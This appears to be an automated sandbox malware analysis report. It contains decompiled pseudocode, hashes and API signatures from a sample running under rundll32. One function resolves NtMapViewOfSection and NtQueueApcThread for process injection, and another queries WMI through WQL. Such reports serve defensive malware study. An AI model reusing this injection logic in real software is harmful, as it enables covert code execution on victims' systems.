                Similarity
                • API ID: ErrorLast$EnumLocalesSystemabort
                • String ID:
                • API String ID: 2459050469-0
                • Opcode ID: 3457bfe5fcbd0153a9a04b2b83fc745b7509e318b3cd9a85cf16f6d4b318fbfc
                • Instruction ID: bac32ea983ef18481b11184b5c66dfad5e406cc36c4f32ba56cf948bbdba7dc0
                • Opcode Fuzzy Hash: 3457bfe5fcbd0153a9a04b2b83fc745b7509e318b3cd9a85cf16f6d4b318fbfc
                • Instruction Fuzzy Hash: 3F11E177A16A54CAEF248F26D0447E8BBA1FBA0FE0F648116CA25473C8DA34D6D1C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 32%
                			E0000021521520611FB0(void* __ecx, void* __edx, signed long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, intOrPtr _a8, long long _a16, long long _a24) {
                				int _t13;
                				void* _t15;
                				void* _t17;
                				void* _t26;
                				signed long long _t34;
                				signed short* _t51;
                
                				_t34 = __rax;
                				_a16 = __rbx;
                				_a24 = __rsi;
                				_t26 = __edx;
                				_t17 = __ecx;
                				E000002152152060C334(__rax, __rbx, __rcx, __rdx, __r9);
                				r9d = 2;
                				asm("bts ecx, 0xa");
                				_t13 = GetLocaleInfoW(??, ??, ??, ??);
                				r10d = 0;
                				if (_t13 != 0) goto 0x20611ff8;
                				goto 0x2061204b;
                				if (_t17 == _a8) goto 0x20612046;
                				if (_t26 == 0) goto 0x20612046;
                				_t51 =  *((intOrPtr*)(_t34 + 0x98));
                				r8d = r10d;
                				_t15 = __rdx - 0x41;
                				if (_t15 - 0x19 <= 0) goto 0x20612027;
                				if (( *_t51 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x20612033;
                				r8d = r8d + 1;
                				goto 0x20612014;
                				if (_t51[(_t34 | 0xffffffff) + 1] != r10w) goto 0x20612037;
                				if (r8d == _t15) goto 0x20611ff4;
                				return 1;
                			}










                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$InfoLocaleabort
                • String ID:
                • API String ID: 3293382891-0
                • Opcode ID: b6937d58de1b3fddba4942bf8e23c18979a53f8c02c17deea7c1570699fd8b7a
                • Instruction ID: 64371b57e730b7ea70ec4e7919892f7a00847a70f6d278091985baddfd80838b
                • Opcode Fuzzy Hash: b6937d58de1b3fddba4942bf8e23c18979a53f8c02c17deea7c1570699fd8b7a
                • Instruction Fuzzy Hash: 8F115C336159B1C6EF74971290487EDA2A1FBE47A4F604221DE35077CCD735E891CB40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: EnumLocalesSystem
                • String ID:
                • API String ID: 2099609381-0
                • Opcode ID: 95cb4c8792f31e9588550a23d261f1c3d45a3fd0a0baf515abd1c6778a738204
                • Instruction ID: 57748f895afbf65443518ae1073fab28c4ddadb315adecbaaed1acfa25edf964
                • Opcode Fuzzy Hash: 95cb4c8792f31e9588550a23d261f1c3d45a3fd0a0baf515abd1c6778a738204
                • Instruction Fuzzy Hash: 3801AD73311F5483E714CB25E8941DA7362FBE8BC0F148065EE484776CDB38D8558740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E0000021521520611AD8(void* __ecx, void* __edx, void* __rax, long long __rbx, signed char* __rcx, void* __rdx, signed int __r8, long long _a8) {
                				signed int _t15;
                				int _t17;
                				void* _t30;
                				signed char* _t32;
                				signed short* _t37;
                				signed long long _t44;
                				void* _t45;
                				void* _t46;
                
                				_t30 = __rax;
                				_a8 = __rbx;
                				_t32 = __rcx;
                				E000002152152060C334(__rax, __rcx, __rcx, __rdx, _t45);
                				_t46 = _t30;
                				_t37 =  *((intOrPtr*)(_t30 + 0x98));
                				_t44 = (__r8 | 0xffffffff) + 1;
                				if (_t37[_t44] != 0) goto 0x20611afa;
                				_t15 = 0 | _t44 == 0x00000003;
                				 *(_t46 + 0xb0) = _t15;
                				if (_t15 != 0) goto 0x20611b45;
                				r9d = 0;
                				r8d =  *_t37 & 0x0000ffff;
                				if (_t44 - 0x41 - 0x19 <= 0) goto 0x20611b3d;
                				r8w = r8w - 0x61;
                				if (r8w - 0x19 > 0) goto 0x20611b42;
                				r9d = r9d + 1;
                				goto 0x20611b20;
                				 *((intOrPtr*)(_t46 + 0xac)) = r9d;
                				_t17 = EnumSystemLocalesW(??, ??);
                				if (( *_t32 & 0x00000004) != 0) goto 0x20611b65;
                				 *_t32 = 0;
                				return _t17;
                			}












                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$EnumLocalesSystemabort
                • String ID:
                • API String ID: 2459050469-0
                • Opcode ID: 787a6c22c84e53a79aaf685c1252849c09613f5819060104d813ef90c67a9d76
                • Instruction ID: 200f1755c497ba8d27a35cd57e54d05cf2cef0b2507e910d028a1ebe8a52e29a
                • Opcode Fuzzy Hash: 787a6c22c84e53a79aaf685c1252849c09613f5819060104d813ef90c67a9d76
                • Instruction Fuzzy Hash: 9401D873709A94C6EB244F15E4447D9B6E1EFE0BA4F61C261DA254B7C8DB7494858700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E0000021521520587AE0(long long* __rax, void* __rcx, void* __rdx, void* __r8, long long __r13, char _a8, char _a24, char _a32) {
                				long long _v56;
                				char _v64;
                				char _v72;
                				intOrPtr _v80;
                				intOrPtr _v88;
                				intOrPtr _v96;
                				long long _v104;
                				long long _v112;
                				long long _v120;
                				void* __rbx;
                				void* __rdi;
                				void* __rsi;
                				void* _t35;
                				void* _t49;
                				void* _t50;
                				void* _t51;
                				long long* _t60;
                				void* _t94;
                				void* _t103;
                
                				_t94 = __rdx;
                				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0x20587aff;
                				goto 0x20587b02;
                				_t103 = __r8;
                				r15d =  *((intOrPtr*)(__r8 + 0x10));
                				GetModuleHandleW(??);
                				GetProcAddress(??, ??);
                				GetProcAddress(??, ??);
                				 *__rax();
                				 *__rax();
                				if (__rcx == 0) goto 0x20587c94;
                				_v56 = __r13;
                				r13d = 0;
                				_a8 = __r13;
                				_a32 = __r13;
                				_v72 = __r13;
                				if (E00000215215205CAB8C(r15d, __rax, __rax,  &_a32, __rax, __rdx,  &_a8) != 0) goto 0x20587c2c;
                				_v64 = __r13;
                				_a24 = __r13;
                				GetModuleHandleW(??);
                				GetProcAddress(??, ??);
                				GetProcAddress(??, ??);
                				_v80 = 0x40;
                				_v88 = r13d;
                				_v96 = 2;
                				r9d = 0;
                				_v104 =  &_v64;
                				_t60 =  &_a24;
                				_v112 = _t60;
                				_v120 = __r13;
                				_t35 =  *__rax();
                				if ( *__rax() != 0) goto 0x20587c2c;
                				r8d = r15d;
                				E00000215215205F7310(_t35, _t49, _t50, _t51, _a32, _t103, __rax, _t94,  &_v72);
                				if (_t94 == 0) goto 0x20587c6f;
                				GetModuleHandleW(??);
                				GetProcAddress(??, ??);
                				r9d = 0;
                				_v120 = r13d;
                				r8d = 0;
                				 *_t60();
                				CloseHandle(??);
                				CloseHandle(??);
                				CloseHandle(??);
                				CloseHandle(??);
                				return 1;
                			}























                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Handle$AddressProc$Close$Module
                • String ID: @$NtMapViewOfSection$NtQueueApcThread$NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 2187694145-438560624
                • Opcode ID: dc3c75fc500df8ae811baa38a3a033ea3aa25aaf20d7cbbc2de829c7185a290e
                • Instruction ID: a7a4ea7fd352374849bde3e2fedbc05238ebba79ed18282f4ad3bdbfbbf6f91d
                • Opcode Fuzzy Hash: dc3c75fc500df8ae811baa38a3a033ea3aa25aaf20d7cbbc2de829c7185a290e
                • Instruction Fuzzy Hash: 82415877306FA4CAEB609B21B85878A7360FBE9B94F544051DE4E03768EF78C549C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 29%
                			E00000215215205CC700(void* __eax, signed int __ecx, void* __esi, long long __rbx, char* __rcx, intOrPtr* __rdx, void* __r8) {
                				void* __rdi;
                				void* __rsi;
                				void* _t181;
                				void* _t184;
                				intOrPtr _t241;
                				intOrPtr _t243;
                				intOrPtr _t246;
                				intOrPtr _t248;
                				long long* _t249;
                				long long* _t250;
                				char* _t261;
                				intOrPtr _t266;
                				void* _t267;
                				intOrPtr* _t270;
                				intOrPtr _t272;
                				void* _t273;
                				intOrPtr* _t277;
                				intOrPtr* _t288;
                				intOrPtr* _t290;
                				intOrPtr* _t306;
                				void* _t321;
                				short* _t322;
                				intOrPtr* _t327;
                				intOrPtr* _t328;
                				void* _t330;
                				long long* _t332;
                				void* _t334;
                				signed long long _t336;
                				void* _t341;
                				long long* _t342;
                				void* _t344;
                				void* _t345;
                				void* _t357;
                				void* _t358;
                				long long _t360;
                				struct HINSTANCE__* _t362;
                				long long* _t364;
                				WCHAR* _t366;
                
                				 *((long long*)(_t344 + 8)) = __rcx;
                				_t342 = _t344 - 0x50;
                				_t345 = _t344 - 0x150;
                				 *((long long*)(_t342 + 0x28)) = 0xfffffffe;
                				 *((long long*)(_t345 + 0x198)) = __rbx;
                				_t358 = __r8;
                				_t261 = __rcx;
                				r13d = 0;
                				 *((intOrPtr*)(_t345 + 0x50)) = r13d;
                				 *((long long*)(_t342 - 0x58)) = _t360;
                				 *((long long*)(_t342 - 0x50)) = _t360;
                				 *((long long*)(_t342 - 0x50)) = 0xf;
                				 *((long long*)(_t342 - 0x58)) = _t360;
                				 *((intOrPtr*)(_t342 - 0x68)) = r13b;
                				 *((long long*)(_t345 + 0x60)) = _t360;
                				 *((long long*)(_t345 + 0x58)) = _t360;
                				 *((long long*)(_t342 - 0x80)) = _t360;
                				 *((long long*)(_t342 - 0x78)) = _t360;
                				 *((long long*)(_t342 - 0x78)) = 0xf;
                				 *((long long*)(_t342 - 0x80)) = _t360;
                				 *((intOrPtr*)(_t345 + 0x70)) = r13b;
                				 *((long long*)(_t345 + 0x20)) = _t345 + 0x60;
                				_t20 = _t360 + 1; // 0x1
                				r8d = _t20;
                				__imp__CoCreateInstance(_t341);
                				if (__eax >= 0) goto 0x205cc845;
                				 *((long long*)(__rcx + 0x18)) = 0xf;
                				 *((long long*)(__rcx + 0x10)) = _t360;
                				 *((intOrPtr*)(__rcx)) = r13b;
                				E0000021521520586E80(__rcx, __rcx, _t345 + 0x70);
                				 *((intOrPtr*)(_t345 + 0x50)) = 1;
                				_t241 =  *((intOrPtr*)(_t342 - 0x78));
                				if (_t241 - 0x10 < 0) goto 0x205cc81f;
                				_t266 =  *((intOrPtr*)(_t345 + 0x70));
                				if (_t241 + 1 - 0x1000 < 0) goto 0x205cc81a;
                				if ((__ecx & 0x0000001f) == 0) goto 0x205cc7ed;
                				0x205faadc();
                				asm("int3");
                				_t243 =  *((intOrPtr*)(_t266 - 8));
                				if (_t243 - _t266 < 0) goto 0x205cc7fc;
                				0x205faadc();
                				asm("int3");
                				_t267 = _t266 - _t243;
                				if (_t267 - 8 >= 0) goto 0x205cc80b;
                				0x205faadc();
                				asm("int3");
                				if (_t267 - 0x27 <= 0) goto 0x205cc817;
                				0x205faadc();
                				asm("int3");
                				0x205f51e4();
                				 *((long long*)(_t342 - 0x78)) = 0xf;
                				 *((long long*)(_t342 - 0x80)) = _t360;
                				 *((char*)(_t345 + 0x70)) = 0;
                				 *((long long*)(_t342 - 0x50)) = 0xf;
                				 *((long long*)(_t342 - 0x58)) = _t360;
                				 *((char*)(_t342 - 0x68)) = 0;
                				goto 0x205ccce0;
                				 *((long long*)(_t345 + 0x40)) = _t345 + 0x58;
                				 *((long long*)(_t345 + 0x38)) = _t360;
                				 *((long long*)(_t345 + 0x30)) = _t360;
                				 *((intOrPtr*)(_t345 + 0x28)) = r13d;
                				 *((long long*)(_t345 + 0x20)) = _t360;
                				r9d = 0;
                				r8d = 0;
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x60)))) + 0x18))() >= 0) goto 0x205cc912;
                				_t270 =  *((intOrPtr*)(_t345 + 0x60));
                				if (_t270 == 0) goto 0x205cc893;
                				 *((intOrPtr*)( *_t270 + 0x10))();
                				 *((long long*)(__rcx + 0x18)) = 0xf;
                				 *((long long*)(__rcx + 0x10)) = _t360;
                				 *__rcx = 0;
                				E0000021521520586E80(__rcx, __rcx, _t345 + 0x70);
                				 *((intOrPtr*)(_t345 + 0x50)) = 1;
                				_t246 =  *((intOrPtr*)(_t342 - 0x78));
                				if (_t246 - 0x10 < 0) goto 0x205cc81f;
                				_t272 =  *((intOrPtr*)(_t345 + 0x70));
                				if (_t246 + 1 - 0x1000 < 0) goto 0x205cc81a;
                				if ((__ecx & 0x0000001f) == 0) goto 0x205cc8e4;
                				0x205faadc();
                				asm("int3");
                				_t248 =  *((intOrPtr*)(_t272 - 8));
                				if (_t248 - _t272 < 0) goto 0x205cc8f3;
                				0x205faadc();
                				asm("int3");
                				_t273 = _t272 - _t248;
                				if (_t273 - 8 >= 0) goto 0x205cc902;
                				0x205faadc();
                				asm("int3");
                				if (_t273 - 0x27 <= 0) goto 0x205cc817;
                				0x205faadc();
                				_t249 =  *0x20683330; // 0x0
                				if (_t249 != 0) goto 0x205cc942;
                				GetModuleHandleW(_t366);
                				GetProcAddress(_t362);
                				 *0x20683330 = _t249;
                				 *((intOrPtr*)(_t345 + 0x38)) = r13d;
                				 *((long long*)(_t345 + 0x30)) = _t360;
                				 *((intOrPtr*)(_t345 + 0x28)) = 3;
                				 *((intOrPtr*)(_t345 + 0x20)) = 3;
                				r9d = 0;
                				r8d = 0;
                				if ( *_t249() >= 0) goto 0x205cc98b;
                				_t277 =  *((intOrPtr*)(_t345 + 0x60));
                				if (_t277 == 0) goto 0x205cc981;
                				_t250 =  *_t277;
                				 *((intOrPtr*)(_t250 + 0x10))();
                				goto 0x205ccc9d;
                				 *((long long*)(_t345 + 0x68)) = _t360;
                				if ( *((long long*)(__rdx + 0x18)) - 0x10 < 0) goto 0x205cc99a;
                				_t336 =  *((intOrPtr*)(__rdx));
                				E00000215215205F4DCC(_t250,  *((intOrPtr*)(_t345 + 0x58)));
                				 *((long long*)(_t342 + 0xa8)) = _t250;
                				if (_t250 == 0) goto 0x205cc9cb;
                				 *((long long*)(_t250 + 8)) = _t360;
                				 *((intOrPtr*)(_t250 + 0x10)) = 1;
                				E00000215215205F6FA0(_t184, _t261, _t336, _t336);
                				 *_t250 = _t250;
                				goto 0x205cc9ce;
                				_t332 = _t360;
                				 *((long long*)(_t342 + 8)) = _t332;
                				if (_t332 != 0) goto 0x205cc9e2;
                				E00000215215205F6F70();
                				E00000215215205F4DCC(_t250, _t336);
                				 *((long long*)(_t342 + 0xa8)) = _t250;
                				if (_t250 == 0) goto 0x205cca17;
                				 *((long long*)(_t250 + 8)) = _t360;
                				 *((intOrPtr*)(_t250 + 0x10)) = 1;
                				E00000215215205F6FA0(_t184, _t261, "WQL", _t336);
                				 *_t250 = _t250;
                				goto 0x205cca1a;
                				_t364 = _t360;
                				 *_t342 = _t364;
                				if (_t364 != 0) goto 0x205cca2e;
                				E00000215215205F6F70();
                				_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x58))));
                				 *((long long*)(_t345 + 0x28)) = _t345 + 0x68;
                				 *((long long*)(_t345 + 0x20)) = _t360;
                				r9d = 0x30;
                				r15d =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x58)))) + 0xa0))();
                				_t337 = _t336 | 0xffffffff;
                				_t190 = __esi;
                				asm("lock inc ecx");
                				if (__esi != 1) goto 0x205cca9b;
                				if ( *_t364 == 0) goto 0x205cca7c;
                				__imp__#6();
                				 *_t364 = _t360;
                				if ( *((intOrPtr*)(_t364 + 8)) == 0) goto 0x205cca8e;
                				E00000215215205F51EC( *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x58)))), _t261, _t336 | 0xffffffff, _t360);
                				 *((long long*)(_t364 + 8)) = _t360;
                				E00000215215205F51EC( *((intOrPtr*)( *((intOrPtr*)(_t345 + 0x58)))), _t261, _t336 | 0xffffffff, _t357);
                				 *_t342 = _t360;
                				asm("lock xadd [edi+0x10], eax");
                				if (__esi != 1) goto 0x205ccadb;
                				if ( *_t332 == 0) goto 0x205ccabc;
                				__imp__#6();
                				 *_t332 = _t360;
                				if ( *((intOrPtr*)(_t332 + 8)) == 0) goto 0x205ccace;
                				E00000215215205F51EC(_t251, _t261, _t336 | 0xffffffff, _t330);
                				 *((long long*)(_t332 + 8)) = _t360;
                				E00000215215205F51EC(_t251, _t261, _t336 | 0xffffffff, _t334);
                				 *((long long*)(_t342 + 8)) = _t360;
                				if (r15d >= 0) goto 0x205ccafe;
                				_t288 =  *((intOrPtr*)(_t345 + 0x58));
                				if (_t288 == 0) goto 0x205ccaf4;
                				 *((intOrPtr*)( *_t288 + 0x10))();
                				goto 0x205ccc9d;
                				_t290 =  *((intOrPtr*)(_t345 + 0x68));
                				if (_t290 == 0) goto 0x205ccc6d;
                				 *((long long*)(_t342 - 0x70)) = _t360;
                				 *((intOrPtr*)(_t342 + 0xa8)) = r13d;
                				 *((long long*)(_t345 + 0x20)) = _t342 + 0xa8;
                				r8d = 1;
                				 *((intOrPtr*)( *_t290 + 0x20))();
                				if ( *((intOrPtr*)(_t342 + 0xa8)) == 0) goto 0x205ccc68;
                				__imp__#8();
                				if ( *((long long*)(_t342 - 0x70)) == 0) goto 0x205ccc68;
                				E00000215215205C7DF0(_t261, _t342 - 0x28, _t358, _t337);
                				_t321 =  >=  ?  *((void*)(_t342 - 0x28)) : _t342 - 0x28;
                				 *((long long*)(_t345 + 0x28)) = _t360;
                				 *((long long*)(_t345 + 0x20)) = _t360;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t342 - 0x70)))) + 0x20))();
                				_t322 =  *((intOrPtr*)(_t342 + 0x18));
                				if (_t322 == 0) goto 0x205ccc28;
                				 *((long long*)(_t342 - 0x38)) = _t360;
                				 *((long long*)(_t342 - 0x30)) = _t360;
                				 *((long long*)(_t342 - 0x30)) = 7;
                				 *((long long*)(_t342 - 0x38)) = _t360;
                				 *((intOrPtr*)(_t342 - 0x48)) = r13w;
                				if ( *_t322 != 0) goto 0x205ccbc0;
                				goto 0x205ccbca;
                				_t339 = _t360 + 1;
                				if ( *((short*)(_t322 + (_t360 + 1) * 2)) != 0) goto 0x205ccbc0;
                				E0000021521520588AC0(_t261, _t342 - 0x48, _t322, _t360 + 1, _t360 + 1);
                				E00000215215205C7F10(_t261, _t342 + 0x30, _t342 - 0x48);
                				E0000021521520586820(E0000021521520588900(__esi, _t261, _t345 + 0x70,  *((intOrPtr*)( *((intOrPtr*)(_t342 - 0x70))))), __esi, _t342 + 0x30);
                				if ( *((intOrPtr*)(_t342 - 0x30)) - 8 < 0) goto 0x205ccc17;
                				E0000021521520588F90(__esi, _t261,  *((intOrPtr*)(_t342 - 0x48)), _t332, _t339,  *((intOrPtr*)(_t342 - 0x30)) + 1, _t342 + 0x10);
                				 *((long long*)(_t342 - 0x30)) = 7;
                				 *((long long*)(_t342 - 0x38)) = _t360;
                				 *((intOrPtr*)(_t342 - 0x48)) = r13w;
                				__imp__#9();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t342 - 0x70)))) + 0x10))();
                				if ( *((intOrPtr*)(_t342 - 0x10)) - 8 < 0) goto 0x205ccc57;
                				E0000021521520588F90(__esi, _t261,  *((intOrPtr*)(_t342 - 0x28)), _t332, _t339,  *((intOrPtr*)(_t342 - 0x10)) + 1, _t342 + 0x10);
                				 *((long long*)(_t342 - 0x10)) = 7;
                				 *((long long*)(_t342 - 0x18)) = _t360;
                				 *((intOrPtr*)(_t342 - 0x28)) = r13w;
                				_t327 =  *((intOrPtr*)(_t345 + 0x58));
                				if (_t327 == 0) goto 0x205ccc85;
                				 *((intOrPtr*)( *_t327 + 0x10))();
                				_t328 =  *((intOrPtr*)(_t345 + 0x60));
                				if (_t328 == 0) goto 0x205ccc9d;
                				 *((intOrPtr*)( *_t328 + 0x10))();
                				_t306 =  *((intOrPtr*)(_t345 + 0x68));
                				if (_t306 == 0) goto 0x205ccca8;
                				 *((intOrPtr*)( *_t306 + 0x10))();
                				 *((long long*)(_t261 + 0x18)) = 0xf;
                				 *((long long*)(_t261 + 0x10)) = _t360;
                				 *_t261 = 0;
                				_t181 = E0000021521520586E80(_t261, _t261, _t345 + 0x70);
                				 *((intOrPtr*)(_t345 + 0x50)) = 1;
                				return E0000021521520586820(E0000021521520586820(_t181, __esi, _t345 + 0x70), _t190, _t342 - 0x68);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$ConvertFreeVariant_com_issue_error_com_util::$AddressClearCreateHandleInitInstanceModuleProc
                • String ID: CoSetProxyBlanket$ROOT\CIMV2$WQL$ole32.dll
                • API String ID: 1924677790-3464224570
                • Opcode ID: 42ca8b9d58faa4aaba85f2fdb7e65cc6d005e06f451428c74cfd2530b8ff380a
                • Instruction ID: 80ebd6be0a8e64a59d6637a645dd8b828d0b3951d13f3eab8971070e89c0114c
                • Opcode Fuzzy Hash: 42ca8b9d58faa4aaba85f2fdb7e65cc6d005e06f451428c74cfd2530b8ff380a
                • Instruction Fuzzy Hash: B7023737702F60C6EB14DB65E88839E7BA0FB95B98F104555DE8A07BA8CF78C498D740
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Xp_mulh$Xp_addx$Xp_setw$get_acsize
                • String ID:
                • API String ID: 2413281849-0
                • Opcode ID: 08556232719dacff47f9c58568dd6f539aeb3d9199d3a2cc78726d0cd2e48932
                • Instruction ID: 12b262dc170e12c1e4ed56f378007fa44dc94dc0932552693e172672b51512a9
                • Opcode Fuzzy Hash: 08556232719dacff47f9c58568dd6f539aeb3d9199d3a2cc78726d0cd2e48932
                • Instruction Fuzzy Hash: 6DC1C132E28B498AF701DB7694810FD7336AF9E344B48DB71EA0D329A5EF28B5459740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E0000021521520591990(long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r9, char _a16) {
                				void* _v40;
                				char _v88;
                				long long _v96;
                				long long _v104;
                				char _v112;
                				long long _v120;
                				long long _v128;
                				char _v136;
                				void* _t111;
                				void* _t112;
                				void* _t113;
                				long long _t136;
                				long long _t137;
                				long long _t138;
                				long long _t139;
                				long long _t140;
                				long long _t142;
                				intOrPtr* _t174;
                				long long _t175;
                				long long _t178;
                				long long _t195;
                				long long _t196;
                				void* _t197;
                
                				_t136 = _t178;
                				_v120 = 0xfffffffe;
                				 *((long long*)(_t136 + 8)) = __rbx;
                				 *((long long*)(_t136 + 0x18)) = __rsi;
                				 *((long long*)(_t136 + 0x20)) = __rdi;
                				r12d = r8d;
                				_t174 = __rdx;
                				_t197 = __rcx;
                				r9d = 0;
                				r8d = 0;
                				CreateEventW(??, ??, ??, ??);
                				_t142 = _t136;
                				 *((long long*)(__rdx + 8)) = _t136;
                				if (_t136 != 0) goto 0x20591a74;
                				_t111 = GetLastError();
                				 *((intOrPtr*)( *__rdx))();
                				E000002152152058F380(__rdx, __rdx);
                				_t195 = _t136;
                				_v112 = _t136;
                				_v104 = _t136;
                				if ( *((intOrPtr*)(_t195 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591a30;
                				 *((intOrPtr*)( *_t195 + 0x30))();
                				goto 0x20591a35;
                				_t137 = _t136 + 2;
                				_v96 = _t137;
                				_v112 = _t111;
                				_v104 = _t195;
                				if (((0 | _t111 != 0x00000000) & 1) == 0) goto 0x20591a74;
                				if (_t137 != 1) goto 0x20591a55;
                				if (_t111 == 0) goto 0x20591a74;
                				_t19 =  &_v112; // 0x4d54ee85da811fe8
                				_t20 =  &_v88; // 0x4d54ee85da812000
                				E0000021521520590B90(0, _t142, _t20, _t19, "thread.entry_event");
                				_t21 =  &_v88; // 0x4d54ee85da812000
                				E000002152152059DF30(_t111, _t142, _t21, __rdx, "thread.entry_event");
                				r9d = 0;
                				r8d = r8d ^ r8d;
                				CreateEventW(??, ??, ??, ??);
                				 *((long long*)(_t197 + 0x10)) = _t137;
                				 *((long long*)(_t174 + 0x10)) = _t137;
                				if ( *((long long*)(_t197 + 0x10)) != 0) goto 0x20591b20;
                				_t112 = GetLastError();
                				 *((intOrPtr*)( *_t174))();
                				E000002152152058F380(_t174, _t19);
                				_t196 = _t137;
                				_v112 = _t137;
                				_v104 = _t137;
                				if ( *((intOrPtr*)(_t196 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591adc;
                				 *((intOrPtr*)( *_t196 + 0x30))();
                				goto 0x20591ae1;
                				_t138 = _t137 + 2;
                				_v96 = _t138;
                				_v112 = _t112;
                				_v104 = _t196;
                				if (((0 | _t112 != 0x00000000) & 1) == 0) goto 0x20591b20;
                				if (_t138 != 1) goto 0x20591b01;
                				if (_t112 == 0) goto 0x20591b20;
                				_t37 =  &_v112; // 0x4d54ee85da811fe8
                				_t38 =  &_v88; // 0x4d54ee85da812000
                				E0000021521520590B90(0, _t142, _t38, _t37, "thread.exit_event");
                				_t39 =  &_v88; // 0x4d54ee85da812000
                				E000002152152059DF30(_t112, _t142, _t39, _t174, "thread.exit_event");
                				_a16 = 0;
                				_t41 =  &_a16; // 0x4d54ee85da812068
                				_t139 = _t41;
                				_v128 = _t139;
                				_v136 = 0;
                				E00000215215205FACE4(0, r12d, _t139, _t142, _t39, _t174, E0000021521520591C30, _t174);
                				 *((long long*)(_t197 + 8)) = _t139;
                				if (_t139 != 0) goto 0x20591bf5;
                				_t113 = GetLastError();
                				 *((intOrPtr*)( *_t174))();
                				if (_t142 == 0) goto 0x20591b75;
                				CloseHandle(??);
                				if ( *((intOrPtr*)(_t197 + 0x10)) == 0) goto 0x20591b84;
                				CloseHandle(??);
                				E000002152152058F380( *((intOrPtr*)(_t197 + 0x10)), _t37);
                				_t175 = _t139;
                				_v112 = _t139;
                				_v104 = _t139;
                				if ( *((intOrPtr*)(_t175 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591bb1;
                				 *((intOrPtr*)( *_t175 + 0x30))();
                				goto 0x20591bb6;
                				_t140 = _t139 + 2;
                				_v96 = _t140;
                				_v112 = _t113;
                				_v104 = _t175;
                				if (((0 | _t113 != 0x00000000) & 1) == 0) goto 0x20591bf5;
                				if (_t140 != 1) goto 0x20591bd6;
                				if (_t113 == 0) goto 0x20591bf5;
                				_t57 =  &_v112; // 0x4d54ee85da811fe8
                				_t58 =  &_v88; // 0x4d54ee85da812000
                				E0000021521520590B90(0, _t142, _t58, _t57, "thread");
                				_t59 =  &_v88; // 0x4d54ee85da812000
                				E000002152152059DF30(_t113, _t142, _t59, _t175, "thread");
                				if (_t142 == 0) goto 0x20591c0f;
                				WaitForSingleObject(??, ??);
                				return CloseHandle(??);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseErrorHandleLast$CreateEvent$ObjectSingleWait
                • String ID: thread$thread.entry_event$thread.exit_event
                • API String ID: 2474323891-3017686385
                • Opcode ID: bf86167c571dfc2279f15b415a5019d1000c7284ff4766e008aa38a0cb6467e3
                • Instruction ID: 361e8aaca1e32833a2cf52138b09fbc168d75c03b19875b4b680aa91ff19f0ad
